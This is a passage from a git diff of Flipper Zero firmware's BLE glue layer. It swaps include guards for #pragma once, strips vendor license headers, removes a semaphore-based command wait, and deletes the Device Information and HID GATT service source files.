provided AS-IS. - * - ***************************************************************************** - */ - -#ifndef BLE_CONST_H__ -#define BLE_CONST_H__ +#pragma once #include #include @@ -115,5 +97,3 @@ extern int hci_send_req(struct hci_request* req, uint8_t async); #ifndef MAX #define MAX(a, b) (((a) > (b)) ? (a) : (b)) #endif - -#endif /* BLE_CONST_H__ */ diff --git a/firmware/targets/f7/ble_glue/ble_dbg_conf.h b/firmware/targets/f7/ble_glue/ble_dbg_conf.h index 8305f8106..6f70f09be 100644 --- a/firmware/targets/f7/ble_glue/ble_dbg_conf.h +++ b/firmware/targets/f7/ble_glue/ble_dbg_conf.h @@ -1,199 +1 @@ -/** - ****************************************************************************** - * File Name : App/ble_dbg_conf.h - * Description : Debug configuration file for BLE Middleware. - * - ****************************************************************************** - * @attention - * - *

© Copyright (c) 2020 STMicroelectronics. - * All rights reserved.

- * - * This software component is licensed by ST under Ultimate Liberty license - * SLA0044, the "License"; You may not use this file except in compliance with - * the License. You may obtain a copy of the License at: - * www.st.com/SLA0044 - * - ****************************************************************************** - */ - -/* Define to prevent recursive inclusion -------------------------------------*/ -#ifndef __BLE_DBG_CONF_H -#define __BLE_DBG_CONF_H - -/** - * Enable or Disable traces from BLE - */ - -#define BLE_DBG_APP_EN 1 -#define BLE_DBG_DIS_EN 1 -#define BLE_DBG_HRS_EN 1 -#define BLE_DBG_SVCCTL_EN 1 -#define BLE_DBG_BLS_EN 1 -#define BLE_DBG_HTS_EN 1 -#define BLE_DBG_P2P_STM_EN 1 - -/** - * Macro definition - */ -#if(BLE_DBG_APP_EN != 0) -#define BLE_DBG_APP_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_APP_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_DIS_EN != 0) -#define BLE_DBG_DIS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_DIS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_HRS_EN != 0) -#define BLE_DBG_HRS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_HRS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_P2P_STM_EN != 0) -#define BLE_DBG_P2P_STM_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_P2P_STM_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_TEMPLATE_STM_EN != 0) -#define BLE_DBG_TEMPLATE_STM_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_TEMPLATE_STM_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_EDS_STM_EN != 0) -#define BLE_DBG_EDS_STM_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_EDS_STM_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_LBS_STM_EN != 0) -#define BLE_DBG_LBS_STM_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_LBS_STM_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_SVCCTL_EN != 0) -#define BLE_DBG_SVCCTL_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_SVCCTL_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_CTS_EN != 0) -#define BLE_DBG_CTS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_CTS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_HIDS_EN != 0) -#define BLE_DBG_HIDS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_HIDS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_PASS_EN != 0) -#define BLE_DBG_PASS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_PASS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_BLS_EN != 0) -#define BLE_DBG_BLS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_BLS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_HTS_EN != 0) -#define BLE_DBG_HTS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_HTS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_ANS_EN != 0) -#define BLE_DBG_ANS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_ANS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_ESS_EN != 0) -#define BLE_DBG_ESS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_ESS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_GLS_EN != 0) -#define BLE_DBG_GLS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_GLS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_BAS_EN != 0) -#define BLE_DBG_BAS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_BAS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_RTUS_EN != 0) -#define BLE_DBG_RTUS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_RTUS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_HPS_EN != 0) -#define BLE_DBG_HPS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_HPS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_TPS_EN != 0) -#define BLE_DBG_TPS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_TPS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_LLS_EN != 0) -#define BLE_DBG_LLS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_LLS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_IAS_EN != 0) -#define BLE_DBG_IAS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_IAS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_WSS_EN != 0) -#define BLE_DBG_WSS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_WSS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_LNS_EN != 0) -#define BLE_DBG_LNS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_LNS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_SCPS_EN != 0) -#define BLE_DBG_SCPS_MSG PRINT_MESG_DBG -#else -#define BLE_DBG_SCPS_MSG PRINT_NO_MESG -#endif - -#if(BLE_DBG_DTS_EN != 0) -#define BLE_DBG_DTS_MSG PRINT_MESG_DBG -#define BLE_DBG_DTS_BUF PRINT_LOG_BUFF_DBG -#else -#define BLE_DBG_DTS_MSG PRINT_NO_MESG -#define BLE_DBG_DTS_BUF PRINT_NO_MESG -#endif - -#endif /*__BLE_DBG_CONF_H */ - -/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ +#pragma once diff --git a/firmware/targets/f7/ble_glue/ble_glue.c b/firmware/targets/f7/ble_glue/ble_glue.c index 2c30612b5..5f129ba8c 100644 --- a/firmware/targets/f7/ble_glue/ble_glue.c +++ b/firmware/targets/f7/ble_glue/ble_glue.c @@ -32,7 +32,6 @@ static uint8_t ble_glue_ble_spare_event_buff[sizeof(TL_PacketHeader_t) + TL_EVT_ typedef struct { FuriMutex* shci_mtx; - FuriSemaphore* shci_sem; FuriThread* thread; BleGlueStatus status; BleGlueKeyStorageChangedCallback callback; @@ -104,7 +103,6 @@ void ble_glue_init() { TL_Init(); ble_glue->shci_mtx = furi_mutex_alloc(FuriMutexTypeNormal); - ble_glue->shci_sem = furi_semaphore_alloc(1, 0); // FreeRTOS system task creation ble_glue->thread = furi_thread_alloc_ex("BleShciDriver", 1024, ble_glue_shci_thread, ble_glue); @@ -393,7 +391,6 @@ void ble_glue_thread_stop() { furi_thread_free(ble_glue->thread); // Free resources furi_mutex_free(ble_glue->shci_mtx); - furi_semaphore_free(ble_glue->shci_sem); ble_glue_clear_shared_memory(); free(ble_glue); ble_glue = NULL; @@ -427,22 +424,6 @@ void shci_notify_asynch_evt(void* pdata) { } } -void shci_cmd_resp_release(uint32_t flag) { - UNUSED(flag); - if(ble_glue) { - furi_semaphore_release(ble_glue->shci_sem); - } -} - -void shci_cmd_resp_wait(uint32_t timeout) { - UNUSED(timeout); - if(ble_glue) { - furi_hal_power_insomnia_enter(); - furi_semaphore_acquire(ble_glue->shci_sem, FuriWaitForever); - furi_hal_power_insomnia_exit(); - } -} - bool ble_glue_reinit_c2() { return SHCI_C2_Reinit() == SHCI_Success; } diff --git a/firmware/targets/f7/ble_glue/compiler.h b/firmware/targets/f7/ble_glue/compiler.h index 98a93d712..1d32c2a2e 100644 --- a/firmware/targets/f7/ble_glue/compiler.h +++ b/firmware/targets/f7/ble_glue/compiler.h @@ -1,22 +1,4 @@ -/***************************************************************************** - * @file compiler.h - * @author MDG - * @brief This file contains the definitions which are compiler dependent. - ***************************************************************************** - * @attention - * - * Copyright (c) 2018-2023 STMicroelectronics. - * All rights reserved. - * - * This software is licensed under terms that can be found in the LICENSE file - * in the root directory of this software component. - * If no LICENSE file comes with this software, it is provided AS-IS. - * - ***************************************************************************** - */ - -#ifndef COMPILER_H__ -#define COMPILER_H__ +#pragma once #ifndef __PACKED_STRUCT #define __PACKED_STRUCT PACKED(struct) @@ -154,5 +136,3 @@ #endif #endif #endif - -#endif /* COMPILER_H__ */ diff --git a/firmware/targets/f7/ble_glue/dev_info_service.c b/firmware/targets/f7/ble_glue/dev_info_service.c deleted file mode 100644 index d24058632..000000000 --- a/firmware/targets/f7/ble_glue/dev_info_service.c +++ /dev/null @@ -1,220 +0,0 @@ -#include "dev_info_service.h" -#include "app_common.h" -#include - -#include -#include -#include - -#define TAG "BtDevInfoSvc" - -typedef struct { - uint16_t service_handle; - uint16_t man_name_char_handle; - uint16_t serial_num_char_handle; - uint16_t firmware_rev_char_handle; - uint16_t software_rev_char_handle; - uint16_t rpc_version_char_handle; - FuriString* version_string; - char hardware_revision[4]; -} DevInfoSvc; - -static DevInfoSvc* dev_info_svc = NULL; - -static const char dev_info_man_name[] = "Flipper Devices Inc."; -static const char dev_info_serial_num[] = "1.0"; -static const char dev_info_rpc_version[] = TOSTRING(PROTOBUF_MAJOR_VERSION.PROTOBUF_MINOR_VERSION); - -static const uint8_t dev_info_rpc_version_uuid[] = - {0x33, 0xa9, 0xb5, 0x3e, 0x87, 0x5d, 0x1a, 0x8e, 0xc8, 0x47, 0x5e, 0xae, 0x6d, 0x66, 0xf6, 0x03}; - -void dev_info_svc_start() { - dev_info_svc = malloc(sizeof(DevInfoSvc)); - dev_info_svc->version_string = furi_string_alloc_printf( - "%s %s %s %s", - version_get_githash(NULL), - version_get_version(NULL), - version_get_gitbranchnum(NULL), - version_get_builddate(NULL)); - snprintf( - dev_info_svc->hardware_revision, - sizeof(dev_info_svc->hardware_revision), - "%d", - version_get_target(NULL)); - tBleStatus status; - - // Add Device Information Service - uint16_t uuid = DEVICE_INFORMATION_SERVICE_UUID; - status = aci_gatt_add_service( - UUID_TYPE_16, (Service_UUID_t*)&uuid, PRIMARY_SERVICE, 11, &dev_info_svc->service_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add Device Information Service: %d", status); - } - - // Add characteristics - uuid = MANUFACTURER_NAME_UUID; - status = aci_gatt_add_char( - dev_info_svc->service_handle, - UUID_TYPE_16, - (Char_UUID_t*)&uuid, - strlen(dev_info_man_name), - CHAR_PROP_READ, - ATTR_PERMISSION_AUTHEN_READ, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_CONSTANT, - &dev_info_svc->man_name_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add manufacturer name char: %d", status); - } - uuid = SERIAL_NUMBER_UUID; - status = aci_gatt_add_char( - dev_info_svc->service_handle, - UUID_TYPE_16, - (Char_UUID_t*)&uuid, - strlen(dev_info_serial_num), - CHAR_PROP_READ, - ATTR_PERMISSION_AUTHEN_READ, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_CONSTANT, - &dev_info_svc->serial_num_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add serial number char: %d", status); - } - uuid = FIRMWARE_REVISION_UUID; - status = aci_gatt_add_char( - dev_info_svc->service_handle, - UUID_TYPE_16, - (Char_UUID_t*)&uuid, - strlen(dev_info_svc->hardware_revision), - CHAR_PROP_READ, - ATTR_PERMISSION_AUTHEN_READ, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_CONSTANT, - &dev_info_svc->firmware_rev_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add firmware revision char: %d", status); - } - uuid = SOFTWARE_REVISION_UUID; - status = aci_gatt_add_char( - dev_info_svc->service_handle, - UUID_TYPE_16, - (Char_UUID_t*)&uuid, - furi_string_size(dev_info_svc->version_string), - CHAR_PROP_READ, - ATTR_PERMISSION_AUTHEN_READ, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_CONSTANT, - &dev_info_svc->software_rev_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add software revision char: %d", status); - } - status = aci_gatt_add_char( - dev_info_svc->service_handle, - UUID_TYPE_128, - (const Char_UUID_t*)dev_info_rpc_version_uuid, - strlen(dev_info_rpc_version), - CHAR_PROP_READ, - ATTR_PERMISSION_AUTHEN_READ, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_CONSTANT, - &dev_info_svc->rpc_version_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add rpc version characteristic: %d", status); - } - - // Update characteristics - status = aci_gatt_update_char_value( - dev_info_svc->service_handle, - dev_info_svc->man_name_char_handle, - 0, - strlen(dev_info_man_name), - (uint8_t*)dev_info_man_name); - if(status) { - FURI_LOG_E(TAG, "Failed to update manufacturer name char: %d", status); - } - status = aci_gatt_update_char_value( - dev_info_svc->service_handle, - dev_info_svc->serial_num_char_handle, - 0, - strlen(dev_info_serial_num), - (uint8_t*)dev_info_serial_num); - if(status) { - FURI_LOG_E(TAG, "Failed to update serial number char: %d", status); - } - status = aci_gatt_update_char_value( - dev_info_svc->service_handle, - dev_info_svc->firmware_rev_char_handle, - 0, - strlen(dev_info_svc->hardware_revision), - (uint8_t*)dev_info_svc->hardware_revision); - if(status) { - FURI_LOG_E(TAG, "Failed to update firmware revision char: %d", status); - } - status = aci_gatt_update_char_value( - dev_info_svc->service_handle, - dev_info_svc->software_rev_char_handle, - 0, - furi_string_size(dev_info_svc->version_string), - (uint8_t*)furi_string_get_cstr(dev_info_svc->version_string)); - if(status) { - FURI_LOG_E(TAG, "Failed to update software revision char: %d", status); - } - status = aci_gatt_update_char_value( - dev_info_svc->service_handle, - dev_info_svc->rpc_version_char_handle, - 0, - strlen(dev_info_rpc_version), - (uint8_t*)dev_info_rpc_version); - if(status) { - FURI_LOG_E(TAG, "Failed to update rpc version char: %d", status); - } -} - -void dev_info_svc_stop() { - tBleStatus status; - if(dev_info_svc) { - furi_string_free(dev_info_svc->version_string); - // Delete service characteristics - status = - aci_gatt_del_char(dev_info_svc->service_handle, dev_info_svc->man_name_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete manufacturer name char: %d", status); - } - status = - aci_gatt_del_char(dev_info_svc->service_handle, dev_info_svc->serial_num_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete serial number char: %d", status); - } - status = aci_gatt_del_char( - dev_info_svc->service_handle, dev_info_svc->firmware_rev_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete firmware revision char: %d", status); - } - status = aci_gatt_del_char( - dev_info_svc->service_handle, dev_info_svc->software_rev_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete software revision char: %d", status); - } - status = - aci_gatt_del_char(dev_info_svc->service_handle, dev_info_svc->rpc_version_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete rpc version char: %d", status); - } - // Delete service - status = aci_gatt_del_service(dev_info_svc->service_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete device info service: %d", status); - } - free(dev_info_svc); - dev_info_svc = NULL; - } -} - -bool dev_info_svc_is_started() { - return dev_info_svc != NULL; -} diff --git a/firmware/targets/f7/ble_glue/hid_service.c b/firmware/targets/f7/ble_glue/hid_service.c deleted file mode 100644 index a31d6015f..000000000 --- a/firmware/targets/f7/ble_glue/hid_service.c +++ /dev/null @@ -1,416 +0,0 @@ -#include "hid_service.h" -#include "app_common.h" -#include - -#include - -#define TAG "BtHid" - -typedef struct { - uint16_t svc_handle; - uint16_t protocol_mode_char_handle; - uint16_t report_char_handle[HID_SVC_REPORT_COUNT]; - uint16_t report_ref_desc_handle[HID_SVC_REPORT_COUNT]; - uint16_t report_map_char_handle; - uint16_t info_char_handle; - uint16_t ctrl_point_char_handle; - // led state - uint16_t led_state_char_handle; - uint16_t led_state_desc_handle; - HidLedStateEventCallback led_state_event_callback; - void* led_state_ctx; -} HIDSvc; - -static HIDSvc* hid_svc = NULL; - -static SVCCTL_EvtAckStatus_t hid_svc_event_handler(void* event) { - SVCCTL_EvtAckStatus_t ret = SVCCTL_EvtNotAck; - hci_event_pckt* event_pckt = (hci_event_pckt*)(((hci_uart_pckt*)event)->data); - evt_blecore_aci* blecore_evt = (evt_blecore_aci*)event_pckt->data; - // aci_gatt_attribute_modified_event_rp0* attribute_modified; - if(event_pckt->evt == HCI_VENDOR_SPECIFIC_DEBUG_EVT_CODE) { - if(blecore_evt->ecode == ACI_GATT_ATTRIBUTE_MODIFIED_VSEVT_CODE) { - // Process modification events - ret = SVCCTL_EvtAckFlowEnable; - } else if(blecore_evt->ecode == ACI_GATT_SERVER_CONFIRMATION_VSEVT_CODE) { - // Process notification confirmation - ret = SVCCTL_EvtAckFlowEnable; - } else if(blecore_evt->ecode == ACI_GATT_WRITE_PERMIT_REQ_VSEVT_CODE) { - // Process write request - aci_gatt_write_permit_req_event_rp0* req = - (aci_gatt_write_permit_req_event_rp0*)blecore_evt->data; - - furi_check(hid_svc->led_state_event_callback && hid_svc->led_state_ctx); - - // this check is likely to be incorrect, it will actually work in our case - // but we need to investigate gatt api to see what is the rules - // that specify attibute handle value from char handle (or the reverse) - if(req->Attribute_Handle == (hid_svc->led_state_char_handle + 1)) { - hid_svc->led_state_event_callback(req->Data[0], hid_svc->led_state_ctx); - aci_gatt_write_resp( - req->Connection_Handle, - req->Attribute_Handle, - 0x00, /* write_status = 0 (no error))*/ - 0x00, /* err_code */ - req->Data_Length, - req->Data); - aci_gatt_write_char_value( - req->Connection_Handle, - hid_svc->led_state_char_handle, - req->Data_Length, - req->Data); - ret = SVCCTL_EvtAckFlowEnable; - } - } - } - return ret; -} - -void hid_svc_start() { - tBleStatus status; - hid_svc = malloc(sizeof(HIDSvc)); - Service_UUID_t svc_uuid = {}; - Char_Desc_Uuid_t desc_uuid = {}; - Char_UUID_t char_uuid = {}; - - // Register event handler - SVCCTL_RegisterSvcHandler(hid_svc_event_handler); - // Add service - svc_uuid.Service_UUID_16 = HUMAN_INTERFACE_DEVICE_SERVICE_UUID; - /** - * Add Human Interface Device Service - */ - status = aci_gatt_add_service( - UUID_TYPE_16, - &svc_uuid, - PRIMARY_SERVICE, - 2 + /* protocol mode */ - (4 * HID_SVC_INPUT_REPORT_COUNT) + (3 * HID_SVC_OUTPUT_REPORT_COUNT) + - (3 * HID_SVC_FEATURE_REPORT_COUNT) + 1 + 2 + 2 + 2 + - 4, /* Service + Report Map + HID Information + HID Control Point + LED state */ - &hid_svc->svc_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add HID service: %d", status); - } - // Add Protocol mode characteristics - char_uuid.Char_UUID_16 = PROTOCOL_MODE_CHAR_UUID; - status = aci_gatt_add_char( - hid_svc->svc_handle, - UUID_TYPE_16, - &char_uuid, - 1, - CHAR_PROP_READ | CHAR_PROP_WRITE_WITHOUT_RESP, - ATTR_PERMISSION_NONE, - GATT_NOTIFY_ATTRIBUTE_WRITE, - 10, - CHAR_VALUE_LEN_CONSTANT, - &hid_svc->protocol_mode_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add protocol mode characteristic: %d", status); - } - // Update Protocol mode characteristic - uint8_t protocol_mode = 1; - status = aci_gatt_update_char_value( - hid_svc->svc_handle, hid_svc->protocol_mode_char_handle, 0, 1, &protocol_mode); - if(status) { - FURI_LOG_E(TAG, "Failed to update protocol mode characteristic: %d", status); - } - -#if(HID_SVC_REPORT_COUNT != 0) - for(uint8_t i = 0; i < HID_SVC_REPORT_COUNT; i++) { - if(i < HID_SVC_INPUT_REPORT_COUNT) { //-V547 - uint8_t buf[2] = {i + 1, 1}; // 1 input - char_uuid.Char_UUID_16 = REPORT_CHAR_UUID; - status = aci_gatt_add_char( - hid_svc->svc_handle, - UUID_TYPE_16, - &char_uuid, - HID_SVC_REPORT_MAX_LEN, - CHAR_PROP_READ | CHAR_PROP_NOTIFY, - ATTR_PERMISSION_NONE, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_VARIABLE, - &(hid_svc->report_char_handle[i])); - if(status) { - FURI_LOG_E(TAG, "Failed to add report characteristic: %d", status); - } - - desc_uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID; - status = aci_gatt_add_char_desc( - hid_svc->svc_handle, - hid_svc->report_char_handle[i], - UUID_TYPE_16, - &desc_uuid, - HID_SVC_REPORT_REF_LEN, - HID_SVC_REPORT_REF_LEN, - buf, - ATTR_PERMISSION_NONE, - ATTR_ACCESS_READ_WRITE, - GATT_DONT_NOTIFY_EVENTS, - MIN_ENCRY_KEY_SIZE, - CHAR_VALUE_LEN_CONSTANT, - &(hid_svc->report_ref_desc_handle[i])); - if(status) { - FURI_LOG_E(TAG, "Failed to add report reference descriptor: %d", status); - } - } else if((i - HID_SVC_INPUT_REPORT_COUNT) < HID_SVC_OUTPUT_REPORT_COUNT) { - uint8_t buf[2] = {i + 1, 2}; // 2 output - char_uuid.Char_UUID_16 = REPORT_CHAR_UUID; - status = aci_gatt_add_char( - hid_svc->svc_handle, - UUID_TYPE_16, - &char_uuid, - HID_SVC_REPORT_MAX_LEN, - CHAR_PROP_READ | CHAR_PROP_NOTIFY, - ATTR_PERMISSION_NONE, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_VARIABLE, - &(hid_svc->report_char_handle[i])); - if(status) { - FURI_LOG_E(TAG, "Failed to add report characteristic: %d", status); - } - - desc_uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID; - status = aci_gatt_add_char_desc( - hid_svc->svc_handle, - hid_svc->report_char_handle[i], - UUID_TYPE_16, - &desc_uuid, - HID_SVC_REPORT_REF_LEN, - HID_SVC_REPORT_REF_LEN, - buf, - ATTR_PERMISSION_NONE, - ATTR_ACCESS_READ_WRITE, - GATT_DONT_NOTIFY_EVENTS, - MIN_ENCRY_KEY_SIZE, - CHAR_VALUE_LEN_CONSTANT, - &(hid_svc->report_ref_desc_handle[i])); - if(status) { - FURI_LOG_E(TAG, "Failed to add report reference descriptor: %d", status); - } - } else { - uint8_t buf[2] = {i + 1, 3}; // 3 feature - char_uuid.Char_UUID_16 = REPORT_CHAR_UUID; - status = aci_gatt_add_char( - hid_svc->svc_handle, - UUID_TYPE_16, - &char_uuid, - HID_SVC_REPORT_MAX_LEN, - CHAR_PROP_READ | CHAR_PROP_NOTIFY, - ATTR_PERMISSION_NONE, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_VARIABLE, - &(hid_svc->report_char_handle[i])); - if(status) { - FURI_LOG_E(TAG, "Failed to add report characteristic: %d", status); - } - - desc_uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID; - status = aci_gatt_add_char_desc( - hid_svc->svc_handle, - hid_svc->report_char_handle[i], - UUID_TYPE_16, - &desc_uuid, - HID_SVC_REPORT_REF_LEN, - HID_SVC_REPORT_REF_LEN, - buf, - ATTR_PERMISSION_NONE, - ATTR_ACCESS_READ_WRITE, - GATT_DONT_NOTIFY_EVENTS, - MIN_ENCRY_KEY_SIZE, - CHAR_VALUE_LEN_CONSTANT, - &(hid_svc->report_ref_desc_handle[i])); - if(status) { - FURI_LOG_E(TAG, "Failed to add report reference descriptor: %d", status); - } - } - } -#endif - // Add led state output report - char_uuid.Char_UUID_16 = REPORT_CHAR_UUID; - status = aci_gatt_add_char( - hid_svc->svc_handle, - UUID_TYPE_16, - &char_uuid, - 1, - CHAR_PROP_READ | CHAR_PROP_WRITE_WITHOUT_RESP | CHAR_PROP_WRITE, - ATTR_PERMISSION_NONE, - GATT_NOTIFY_ATTRIBUTE_WRITE | GATT_NOTIFY_WRITE_REQ_AND_WAIT_FOR_APPL_RESP, - 10, - CHAR_VALUE_LEN_CONSTANT, - &(hid_svc->led_state_char_handle)); - if(status) { - FURI_LOG_E(TAG, "Failed to add led state characteristic: %d", status); - } - - // Add led state char descriptor specifying it is an output report - uint8_t buf[2] = {HID_SVC_REPORT_COUNT + 1, 2}; - desc_uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID; - status = aci_gatt_add_char_desc( - hid_svc->svc_handle, - hid_svc->led_state_char_handle, - UUID_TYPE_16, - &desc_uuid, - HID_SVC_REPORT_REF_LEN, - HID_SVC_REPORT_REF_LEN, - buf, - ATTR_PERMISSION_NONE, - ATTR_ACCESS_READ_WRITE, - GATT_DONT_NOTIFY_EVENTS, - MIN_ENCRY_KEY_SIZE, - CHAR_VALUE_LEN_CONSTANT, - &(hid_svc->led_state_desc_handle)); - if(status) { - FURI_LOG_E(TAG, "Failed to add led state descriptor: %d", status); - } - // Add Report Map characteristic - char_uuid.Char_UUID_16 = REPORT_MAP_CHAR_UUID; - status = aci_gatt_add_char( - hid_svc->svc_handle, - UUID_TYPE_16, - &char_uuid, - HID_SVC_REPORT_MAP_MAX_LEN, - CHAR_PROP_READ, - ATTR_PERMISSION_NONE, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_VARIABLE, - &hid_svc->report_map_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add report map characteristic: %d", status); - } - - // Add Information characteristic - char_uuid.Char_UUID_16 = HID_INFORMATION_CHAR_UUID; - status = aci_gatt_add_char( - hid_svc->svc_handle, - UUID_TYPE_16, - &char_uuid, - HID_SVC_INFO_LEN, - CHAR_PROP_READ, - ATTR_PERMISSION_NONE, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_CONSTANT, - &hid_svc->info_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add information characteristic: %d", status); - } - // Add Control Point characteristic - char_uuid.Char_UUID_16 = HID_CONTROL_POINT_CHAR_UUID; - status = aci_gatt_add_char( - hid_svc->svc_handle, - UUID_TYPE_16, - &char_uuid, - HID_SVC_CONTROL_POINT_LEN, - CHAR_PROP_WRITE_WITHOUT_RESP, - ATTR_PERMISSION_NONE, - GATT_NOTIFY_ATTRIBUTE_WRITE, - 10, - CHAR_VALUE_LEN_CONSTANT, - &hid_svc->ctrl_point_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add control point characteristic: %d", status); - } - - hid_svc->led_state_event_callback = NULL; - hid_svc->led_state_ctx = NULL; -} - -bool hid_svc_update_report_map(const uint8_t* data, uint16_t len) { - furi_assert(data); - furi_assert(hid_svc); - - tBleStatus status = aci_gatt_update_char_value( - hid_svc->svc_handle, hid_svc->report_map_char_handle, 0, len, data); - if(status) { - FURI_LOG_E(TAG, "Failed updating report map characteristic: %d", status); - return false; - } - return true; -} - -bool hid_svc_update_input_report(uint8_t input_report_num, uint8_t* data, uint16_t len) { - furi_assert(data); - furi_assert(hid_svc); - - tBleStatus status = aci_gatt_update_char_value( - hid_svc->svc_handle, hid_svc->report_char_handle[input_report_num], 0, len, data); - if(status) { - FURI_LOG_E(TAG, "Failed updating report characteristic: %d", status); - return false; - } - return true; -} - -bool hid_svc_update_info(uint8_t* data, uint16_t len) { - furi_assert(data); - furi_assert(hid_svc); - - tBleStatus status = - aci_gatt_update_char_value(hid_svc->svc_handle, hid_svc->info_char_handle, 0, len, data); - if(status) { - FURI_LOG_E(TAG, "Failed updating info characteristic: %d", status); - return false; - } - return true; -} - -void hid_svc_register_led_state_callback(HidLedStateEventCallback callback, void* context) { - furi_assert(hid_svc); - furi_assert(callback); - furi_assert(context); - - hid_svc->led_state_event_callback = callback; - hid_svc->led_state_ctx = context; -} - -bool hid_svc_is_started() { - return hid_svc != NULL; -} - -void hid_svc_stop() { - tBleStatus status; - if(hid_svc) { - // Delete characteristics - status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->report_map_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete Report Map characteristic: %d", status); - } -#if(HID_SVC_INPUT_REPORT_COUNT != 0) - for(uint8_t i = 0; i < HID_SVC_REPORT_COUNT; i++) { - status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->report_char_handle[i]); - if(status) { - FURI_LOG_E(TAG, "Failed to delete Report characteristic: %d", status); - } - } -#endif - status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->protocol_mode_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete Protocol Mode characteristic: %d", status); - } - status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->info_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete Information characteristic: %d", status); - } - status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->ctrl_point_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete Control Point characteristic: %d", status); - } - status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->led_state_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete led state characteristic: %d", status); - } - // Delete service - status = aci_gatt_del_service(hid_svc->svc_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete HID service: %d", status); - } - // Delete buffer size mutex - free(hid_svc); - hid_svc = NULL; - } -} diff --git a/firmware/targets/f7/ble_glue/hsem_map.h 